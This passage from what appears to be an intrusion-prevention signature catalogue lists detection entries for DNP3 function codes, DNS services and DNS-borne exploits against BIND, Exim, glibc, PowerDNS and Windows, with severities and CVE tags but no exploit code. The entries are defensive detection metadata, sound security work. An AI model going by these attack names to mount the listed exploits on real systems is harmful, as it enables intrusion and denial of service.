Context: DNP3 (UDP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Link-Status

About this situation: DNP3 Link Layer Link Status function code detected
Context: DNP3 (UDP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Nack

About this situation: DNP3 Link Layer Negative Acknowledgement function code detected
Context: DNP3 (UDP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Not-Supported

About this situation: DNP3 Link Layer Not Supported function code detected
Context: DNP3 (UDP) raw response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Obsolete-Primary-Function-Code

About this situation: DNP3 Obsolete link layer function code detected
Context: DNP3 (UDP) raw response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Obsolete-Secondary-Function-Code

About this situation: DNP3 Obsolete Link Layer function code detected
Context: DNP3 (UDP) raw response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Request-Link-Status

About this situation: DNP3 Link Layer Request Link Status function code detected
Context: DNP3 (UDP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Reserved-Primary-Function-Code

About this situation: DNP3 Reserved function code detected
Context: DNP3 (UDP) raw response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Reserved-Secondary-Function-Code

About this situation: DNP3 Link Layer reserved function code detected
Context: DNP3 (UDP) raw response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Reset-Link-States

About this situation: DNP3 Reset Link States function code detected
Context: DNP3 (UDP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Test-Link-States

About this situation: DNP3 Test Links States function code detected
Context: DNP3 (UDP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Unconfirmed-User-Data

About this situation: DNP3 Unconfirmed User Data function code detected
Context: DNP3 (UDP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Open-File-Request

About this situation: DNP3 Open File request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Operate-Request

About this situation: DNP3 Operate request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Read-Request

About this situation: DNP3 Read request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Record-Current-Time-Request

About this situation: DNP3 Record Current Time request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Request-Reserved-Function-Code

About this situation: DNP3 request with reserved function code detected
Context: DNP3 (UDP) application request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Response-Reserved-Function-Code

About this situation: DNP3 response with reserved function code detected
Context: DNP3 (UDP) application response
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Save-Configuration-Request

About this situation: DNP3 Save Configuration request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Select-Request

About this situation: DNP3 Select request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Solicited-Response

About this situation: DNP3 solicited response detected
Context: DNP3 (UDP) application response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Start-Application-Request

About this situation: DNP3 Start Application request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Stop-Application-Request

About this situation: DNP3 Stop Application request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Unsolicited-Response

About this situation: DNP3 unsolicited response detected
Context: DNP3 (UDP) application response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Warm-Restart-Request

About this situation: DNP3 Warm Restart request detected
Context: DNP3 (UDP) application request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Write-Request

About this situation: DNP3 Write request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNS

About this situation: DNS traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-1586-5242
Description: DNS is used to resolve names to addresses or vice versa.
Back to top

DNS Sinkhole Stop Condition

About this situation: DNS Sinkhole Stop Condition
Context: Local Correlation
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1581-5242
Last changed: sgpkg-ips-1581-5242
Description: DNS Sinkhole Stop Condition for use with DNS Host List Applications.
Back to top

DNS-Made-Easy

About this situation: DNS Made Easy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: DNS Made Easy offers enterprise managed DNS and geographical load balancing services on a global IP Anycast DNS network.
Back to top

DNS-Over-HTTPS

About this situation: DNS-Over-HTTPS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1873-5242
Description: DNS over HTTPS technique can be used to tunnel DNS requests inside HTTPS requests. As opposed to DNS Over TLS, the DNS traffic is sent over HTTP/HTTP2 requests and responses inside the TLS tunnel. This network application matches the SNI extension in the TLS Client Hello message, which means that some DNS-Over-TLS connections will initially be identified by this application before the traffic is decrypted. If the traffic is not decrypted, it is not possible to know whether the traffic is DNS over HTTPS or DNS over TLS. It is also common that the tunneled DNS connections do not use an SNI extension, in which case the connection will only be identified as a generic TLS connection if not decrypted. The service element "DNS over TLS" can be used for enabling decryption and protocol identification in the default port TCP/853.
Back to top

DNS-Over-TLS

About this situation: DNS-Over-TLS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1730-5242
Description: DNS over TLS technique can be used to tunnel DNS requests inside TLS packets. As opposed to DNS Over HTTPS, the DNS traffic is sent as pure DNS inside the TLS tunnel. The network application DNS-Over-HTTPS matches the SNI extension in the TLS Client Hello message, which means that some DNS-Over-TLS connections will initially be identified as DNS-Over-HTTPS before the traffic is decrypted. If the traffic is not decrypted, it is not possible to know whether the traffic is DNS over HTTPS or DNS over TLS. It is also common that the tunneled DNS connections do not use an SNI extension, in which case the connection will only be identified as a generic TLS connection if not decrypted. The service element "DNS over TLS" can be used for enabling decryption and protocol identification in the default port TCP/853.
Back to top

DNS-Park

About this situation: Application DNS-Park detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DNS Park provides reliable anycast DNS hosting services, dynamic DNS, mail backup, email forwarding, URL redirection services and more.
Back to top

DNS-TCP_Alpha-Serverside-ShellCode-Detect

About this situation: Possible Alpha shellcode detected in the DNS connection
Context: DNS TCP Server Stream
Severity: 8
Tags: Any Operating System, Alpha, DNS client, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

DNS-TCP_DirectConnect-Client-To-Client-Handshake

About this situation: Detects DirectConnect client handshake, possible DDOS attempt
Context: DNS TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: DirectConnect-ConnectToMe-DOS
Description:
Back to top

DNS-TCP_Empty-TTL-In-Reply

About this situation: An empty TTL field in DNS reply detected.
Context: DNS TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2017, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-958-5242
Last changed: sgpkg-ips-958-5242
Vulnerability: Isc-Bind-RPZ-Query-Processing-Denial-Of-Service
Description:
Back to top

DNS-TCP_Exim-DKIM-DNS-Decoding-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Exim Project Exim detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, CVE2012, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-1406-5242
Vulnerability: Exim-DKIM-DNS-Decoding-Buffer-Overflow
Description:
Back to top

DNS-TCP_Gnu-C-Library-Getaddrinfo-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GNU glibc detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2015, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Vulnerability: Gnu-C-Library-Getaddrinfo-Buffer-Overflow
Description:
Back to top

DNS-TCP_Iquery-ADM-W0rm-Detection

About this situation: -ADM W0rm- detected
Context: DNS TCP Client Stream
Severity: 10
Tags: Any Operating System, x86, BIND, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_Iquery-BOF-12

About this situation: Linux BIND DNS server exploit detected
Context: DNS TCP Client Stream
Severity: 10
Tags: Linux, x86, BIND, CVE1999, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service

About this situation: Attempt to exploit a denial of service vulnerability in ISC BIND 9 over tcp detected
Context: DNS TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BIND, CVE2009, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-236-3038
Last changed: sgpkg-ips-236-3038
Vulnerability: ISC-BIND-Dynamic-Update-Request-Denial-Of-Service
Description:
Back to top

DNS-TCP_Isc-Bind-Openpgpkey61c-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Isc-Bind-Openpgpkey61c-Denial-Of-Service
Description:
Back to top

DNS-TCP_ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-537-5211
Vulnerability: ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service
Description:
Back to top

DNS-TCP_Isc-Bind-Regular-Expression-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2013, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Vulnerability: Isc-Bind-Regular-Expression-Handling-Denial-Of-Service
Description:
Back to top

DNS-TCP_ISC-BIND-RRSIG-RRsets-Denial-Of-Service

About this situation: An attempt to exploit a DoS vulnerability in ISC BIND detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2011, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: ISC-BIND-RRSIG-RRsets-Denial-Of-Service
Description:
Back to top

DNS-TCP_ISC-BIND-TCP-Receive-Buffer-Length-Assertion-DoS

About this situation: An attempt to exploit a vulnerability in ISC BIND detected.
Context: DNS TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1654-5242
Vulnerability: ISC-BIND-TCP-Receive-Buffer-Length-Assertion-DoS
Description:
Back to top

DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS

About this situation: A name server denial of service query
Context: DNS TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BIND, CVE2015, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: ISC-BIND-TKEY-Queries-Input-Validation-DoS
Description:
Back to top

DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-2

About this situation: A name server denial of service query
Context: DNS TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2015, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-669-5211
Vulnerability: ISC-BIND-TKEY-Queries-Input-Validation-DoS
Description:
Back to top

DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-3

About this situation: A name server denial of service query
Context: DNS TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2015, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: ISC-BIND-TKEY-Queries-Input-Validation-DoS
Description:
Back to top

DNS-TCP_ISC-BIND-TKEY-SPNEGO-der_Get_Oid-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2020, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Vulnerability: ISC-BIND-TKEY-SPNEGO-der_Get_Oid-Out-Of-Bounds-Write
Description:
Back to top

DNS-TCP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Vulnerability: ISC-BIND-Zero-Length-Rdata-Denial-Of-Service
Description:
Back to top

DNS-TCP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service-2

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, BIND, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-852-5242
Vulnerability: ISC-BIND-Zero-Length-Rdata-Denial-Of-Service
Description:
Back to top

DNS-TCP_Localhost-Address-Resolved

About this situation: DNS query reply with a localhost address resolve detected
Context: DNS TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Description:
Back to top

DNS-TCP_Message-Parser

About this situation: Parser support for DNS messages in TCP contexts
Context: ANY Common Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1390-5242
Last changed: sgpkg-ips-1390-5242
Description:
Back to top

DNS-TCP_Microsoft-SMTP-Server-DNS-Handling-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exchange Server 2003, Windows Server, MS2004-10, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-SMTP-Server-DNS-Handling-Vulnerability
Description:
Back to top

DNS-TCP_Microsoft-Windows-DNS-Client-Buffer-Overrun

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2006-08, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Windows-DNS-Client-Buffer-Overrun
Description:
Back to top

DNS-TCP_Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service

About this situation: Detects denial of service exploits against Microsoft Windows XP
Context: DNS TCP Client Stream
Severity: 2
Tags: Windows XP, x86, CVE2006, Windows XP not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-NAT-Helper-DNS-Query-Denial-Of-Service
Description:
Back to top

DNS-TCP_MIPS-IRIX-NXT-BOF

About this situation: BIND NXT record buffer overflow attack on IRIX operating system
Context: DNS TCP Server Stream
Severity: 10
Tags: IRIX, MIPS, BIND, CVE1999, IRIX not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-NXT-BO
Description:
Back to top

DNS-TCP_MIPS-Serverside-ShellCode-Detect

About this situation: Possible MIPS shellcode detected in the DNS server stream
Context: DNS TCP Server Stream
Severity: 8
Tags: Any Operating System, MIPS, DNS client, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

DNS-TCP_Multiple-Vendors-DNS-DNSSEC-Response-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2023, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Multiple-Vendors-DNS-DNSSEC-Response-Handling-Denial-Of-Service
Description:
Back to top

DNS-TCP_Multiple-Vendors-DNS-DNSSEC-Response-Handling-Possible-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: DNS TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2023, Any Operating System not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Multiple-Vendors-DNS-DNSSEC-Response-Handling-Denial-Of-Service
Description:
Back to top

DNS-TCP_Nameserver-Version-Query

About this situation: A name server version query has been detected
Context: DNS TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BIND, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-Version-Query
Description:
Back to top

DNS-TCP_Pa-RISC-ShellCode-Detect

About this situation: Possible PA-RISC shellcode detected in the DNS server stream
Context: DNS TCP Server Stream
Severity: 8
Tags: Any Operating System, PA-RISC, DNS client, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

DNS-TCP_Php-DNS_Get_Record-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in PHP detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1142-5242
Vulnerability: Php-DNS_Get_Record-Out-Of-Bounds-Read
Description:
Back to top

DNS-TCP_PowerDNS-Authoritative-Server-Packet-Processing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PowerDNS PowerDNS Authoritative Server detected
Context: DNS TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PowerDNS Authoritative Server, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Vulnerability: PowerDNS-Authoritative-Server-DNS-Packet-Processing-Denial-Of-Service
Description:
Back to top

DNS-TCP_PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PowerDNS Recursor detected
Context: DNS TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PowerDNS Recursor, PowerDNS Authoritative Server, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service
Description:
Back to top

DNS-TCP_PPC-Serverside-ShellCode-Detect

About this situation: Possible PPC shellcode detected in the DNS server stream
Context: DNS TCP Server Stream
Severity: 8
Tags: Any Operating System, POWER, DNS client, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

DNS-TCP_Reply-Type-Null

About this situation: DNS reply with type NULL detected
Context: DNS TCP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-1076-5242
Last changed: sgpkg-ips-1076-5242
Description:
Back to top

DNS-TCP_Sparc-BOF

About this situation: Possible DNS buffer overflow exploit detected
Context: DNS TCP Client Stream
Severity: 7
Tags: Sun Solaris 2.5, Sparc, BIND, CVE1999, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Solaris-BIND-Inverse-Query-BO
Description:
Back to top

DNS-TCP_Sparc-Serverside-ShellCode-Detect

About this situation: Possible SPARC shellcode detected in the DNS server stream
Context: DNS TCP Server Stream
Severity: 8
Tags: Any Operating System, Sparc, DNS client, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic, Shellcode Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Description:
Back to top

DNS-TCP_Sparc-Solaris-NXT-BOF-1

About this situation: BIND NXT record buffer overflow attack on Solaris operating system
Context: DNS TCP Server Stream
Severity: 10
Tags: Solaris, Sparc, BIND, CVE1999, Solaris not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: BIND-NXT-BO
Description:
Back to top

DNS-TCP_Squid-DNS-Lookup-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid Web Proxy Cache detected
Context: DNS TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Vulnerability: Squid-DNS-Lookup-Denial-Of-Service
Description:
Back to top

DNS-TCP_Standard-Query-Request-Type-A

About this situation: A DNS Standard Query Request with type A detected
Context: DNS TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description:
Back to top

DNS-TCP_Standard-Query-Request-Type-AAAA

About this situation: A DNS Standard Query Request with type AAAA detected
Context: DNS TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description:
Back to top

DNS-TCP_Standard-Query-Request-Type-CNAME

About this situation: A DNS Standard Query Request with type CNAME detected
Context: DNS TCP Client Stream
Severity: 1
